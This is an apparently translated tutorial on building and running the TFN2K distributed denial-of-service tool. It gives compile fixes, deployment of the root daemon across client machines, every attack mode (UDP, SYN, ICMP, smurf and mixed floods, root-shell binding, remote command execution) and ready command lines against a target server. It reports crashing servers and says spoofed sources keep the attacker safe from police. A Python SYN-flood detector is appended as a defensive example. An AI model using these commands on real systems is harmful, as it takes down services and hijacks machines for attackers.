Linux DDOS attack on Windows system

  

First, the configuration of the client and server used for the attack. The test uses the best-known Linux, Red Hat; I used Fedora Core 3 for this attack test, and the software is the best-known DDoS tool.

Without further ado, let's start setting up the server.

Unpack the archive: tar -zxvf tfn2k.tgz

I. Installing TFN2K

TFN2K is open source software, so it has to be compiled. Compiling itself needs no explanation, but a few points must be noted, because different Linux versions and vendors require different settings.

First modify src/ip.h

Comment out the following sections, otherwise the compilation will fail.

/*struct in_addr
{
    unsigned long int s_addr;
};*/

Then run make to compile.

During compilation you are prompted to set the server password, 8-32 digits long. (You need to enter this password when attacking.) After compiling, two new executable files appear, td and tfn. td is the daemon, the process that runs on the client machines, and tfn is the server control process. To attack, the td process must be started first and the server process run afterwards; otherwise the attack has no effect. To change the password, run mkpass. Finally, install and run td (requires root permission) on all clients, and create a text file on the server that records all the client IP addresses (you can edit it with vi), in the format:

192.168.0.1
192.168.0.2
192.168.0.3
IP
IP
……

Then run ./tfn on the main server.

II. Attack

Run ./tfn by itself and press Enter to see the available parameters; readers with good English will not need me to say much more :)

Format: ./tfn <parameters>

We skip the parameters that are not needed; this attack uses:

-f  Followed by the name of the text file just written; this is the real DDoS attack, not DoS

-h  DoS attack, that is, a stand-alone, one-to-one attack; followed by a host or IP address

-p  Followed by a port; needless to say

-c  The most critical parameter, with 11 values in total

0 - Stop the attack; handy to have

1 - Anti-spoofing level setting: the TFN tool sends packets with a source address during the attack, but the source address is random, that is, the address is not your own, so don't worry about the police. Haha

2 - Change the packet size: the ICMP/8, smurf and UDP attacks use the smallest packet by default. You can increase the size by changing the number of payload bytes in each packet.

3 - Bind a root shell: starts a session service, after which you can get a root shell by connecting to a specific port.

4 - UDP flood attack: this attack relies on each UDP packet being sent to a closed port, so that an ICMP unreachable message is returned, which adds to the effect of the attack.

5 - SYN flood attack: this attack regularly sends false connection requests. The result is denial of service on the target port as entries pile up in the TCP connection table, and the attack potential is increased by the TCP/RST responses to non-existent hosts. This is a standard denial-of-service attack.

6 - ICMP response (ping) attack: this attack sends ping requests from a fake address, and the target host returns a response packet of the same size.

7 - SMURF attack: sends ping requests carrying the target host's address to broadcast amplifiers, so that the target host receives multiple replies.

8 - MIX attack: sends UDP, SYN and ICMP packets alternately in a 1:1:1 ratio, so that it can deal with routers, other packet forwarding devices, NIDS, sniffers and so on, bombarding them in turn :)

9 - TARGA3 Attack

10 - Remote command execution: this is an additional function of TFN. In fact, TFN is not only for DoS attacks but also for remote control, for example:

./tfn -f hostext -c 10 -i "mkdir /root/edison"

Creates edison under the root directory on all hosts; -i is followed by the "command" parameter.

The basic attacks are as follows:

./tfn -f hostext -c 4 -i www.xxx.com

Uses the hosts recorded in the hostext file to perform a UDP attack on the 163 server (the td process must be started on all of the hosts)

./tfn -f hostext -c 5 -i www.xxx.com -p 80

Uses the hosts recorded in the hostext file to perform a TCP denial-of-service attack on the 163 server (80 attacks the web service; other ports need no explanation)

./tfn -f hostext -c 6 -i www.xxx.com

Uses the hosts recorded in the hostext file to perform an ICMP attack on the 163 server (PING attack; buffer overflow, crashes immediately)

./tfn -f hostext -c 8 -i www.xxx.com

Uses the hosts recorded in the hostext file to perform a round of ICMP, TCP and UDP attacks on the 163 server (if the other side is running a sniffer, it must cry)

./tfn -f hostext -c 0

Makes the hosts stop attacking

That covers the basics. Finally, my test results:

One-to-one attack, TCP connection mode: local stand-alone machine CPU 13%; attacked server CPU usage above 70%, fluctuating from time to time.

Two-to-one attack, TCP connection mode: local stand-alone machine CPU 13%; attacked server CPU usage 100%.

Five-to-one attack, TCP connection mode: local stand-alone machine CPU 13%; the attacked server crashes. I only have 6 machines at home, but with more, dozens of machines, the average personal server will definitely die.

One-to-one attack, ICMP mode: local stand-alone machine CPU 18%; attacked server CPU usage 96% or more, fluctuating from time to time.

Two-to-one attack, ICMP mode: local stand-alone machine CPU 18%; the attacked server could not be accessed and was almost impossible to use, dead within half an hour. It seems the power is not small.
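Seen from the attacked server, the SYN flood described under command 5 has a recognisable signature: many bare SYNs to one port, almost none of them completing the handshake, from source addresses that hardly ever repeat because they are random. The detector below is an added example, not part of the original article or of TFN2K; the record format, thresholds, addresses and function names are assumptions, and the sample traffic is constructed.

```python
import random
from collections import defaultdict

def detect_syn_flood(packets, window=1.0, min_syns=100,
                     max_completion=0.1, min_src_ratio=0.8):
    """Flag (window, dst, dport) buckets that look like a spoofed SYN flood.

    packets: (ts, src, dst, dport, flag) tuples seen at the victim side
    (assumed format); flag is "S" for a bare SYN, "A" for the ACK that
    completes a three-way handshake.
    """
    buckets = defaultdict(lambda: {"syn": 0, "ack": 0, "srcs": set()})
    for ts, src, dst, dport, flag in packets:
        b = buckets[(int(ts // window), dst, dport)]
        if flag == "S":
            b["syn"] += 1
            b["srcs"].add(src)
        elif flag == "A":
            b["ack"] += 1
    alerts = []
    for (slot, dst, dport), b in sorted(buckets.items()):
        if b["syn"] < min_syns:
            continue  # too little traffic in this window to judge
        completion = b["ack"] / b["syn"]        # share of handshakes finished
        src_ratio = len(b["srcs"]) / b["syn"]   # near 1.0 for random sources
        if completion <= max_completion and src_ratio >= min_src_ratio:
            alerts.append({"window_start": slot * window, "dst": dst,
                           "dport": dport, "syns": b["syn"],
                           "completion": round(completion, 3),
                           "distinct_src_ratio": round(src_ratio, 3)})
    return alerts

def constructed_sample(seed=7):
    """Constructed traffic: normal load, a spoofed SYN burst, busy normal load."""
    rng = random.Random(seed)
    victim, pkts = "192.0.2.10", []
    for i in range(40):    # window 0: 40 clients, every handshake completes
        src = f"198.51.100.{i + 1}"
        pkts += [(0.01 * i, src, victim, 80, "S"),
                 (0.01 * i + 0.005, src, victim, 80, "A")]
    for i in range(500):   # window 1: 500 SYNs, random sources, no ACKs
        src = ".".join(str(rng.randint(1, 254)) for _ in range(4))
        pkts.append((1.0 + 0.001 * i, src, victim, 80, "S"))
    for i in range(150):   # window 2: 150 real clients, all complete
        src = f"203.0.113.{i + 1}"
        pkts += [(2.0 + 0.005 * i, src, victim, 80, "S"),
                 (2.0 + 0.005 * i + 0.002, src, victim, 80, "A")]
    return pkts

if __name__ == "__main__":
    for alert in detect_syn_flood(constructed_sample()):
        print(alert)
```

Only the middle window is flagged; the busy but legitimate third window passes because its handshakes complete. The thresholds are illustrative and need tuning against a baseline of the monitored service.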
